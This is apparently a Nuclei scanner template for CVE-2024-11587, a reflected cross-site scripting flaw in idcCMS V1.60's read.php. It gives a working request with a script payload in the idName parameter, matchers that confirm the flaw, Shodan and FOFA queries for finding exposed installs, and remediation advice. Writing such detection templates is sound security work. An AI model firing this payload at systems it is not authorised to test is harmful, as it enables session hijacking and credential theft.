info: name:idcCMS V1.60 - Cross-Site Scripting author:ritikchaddha severity:medium description:| idcCMS V1.60 is vulnerable to reflected cross-site scripting (XSS) via the idName parameter in read.php. Unsanitized user input is reflected in the response, allowing arbitrary JavaScript execution. impact:| Successful exploitation of this XSS vulnerability allows attackers to execute arbitrary JavaScript code in victims' browsers, potentially leading to session hijacking, credential theft, or other malicious activities. remediation:| Update idcCMS to the latest version. Implement proper input validation and output encoding for all user-supplied data, especially the idName parameter in read.php. reference: -https://github.com/Hebing123/cve/issues/75 -https://nvd.nist.gov/vuln/detail/CVE-2024-11587 classification: cvss-metrics:CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score:6.1 cve-id:CVE-2024-11587 cwe-id:CWE-79 cpe:cpe:2.3:a:idccms:idccms:1.60:*:*:*:*:*:*:* metadata: verified:true max-request:1 vendor:idccms product:idccms fofa-query:title="idcCMS" shodan-query:title:"idcCMS" tags:cve,cve2024,xss,idccms
http: -method: GET path: -"{{BaseURL}}/read.php?idName=1%3Cscript%3Ealert(document.domain)%3C/script%3E&mudi=getCityData"
matchers-condition:and matchers: -type: word part:body words: -'<script>alert(document.domain)</script>' -'add(new Option' condition:and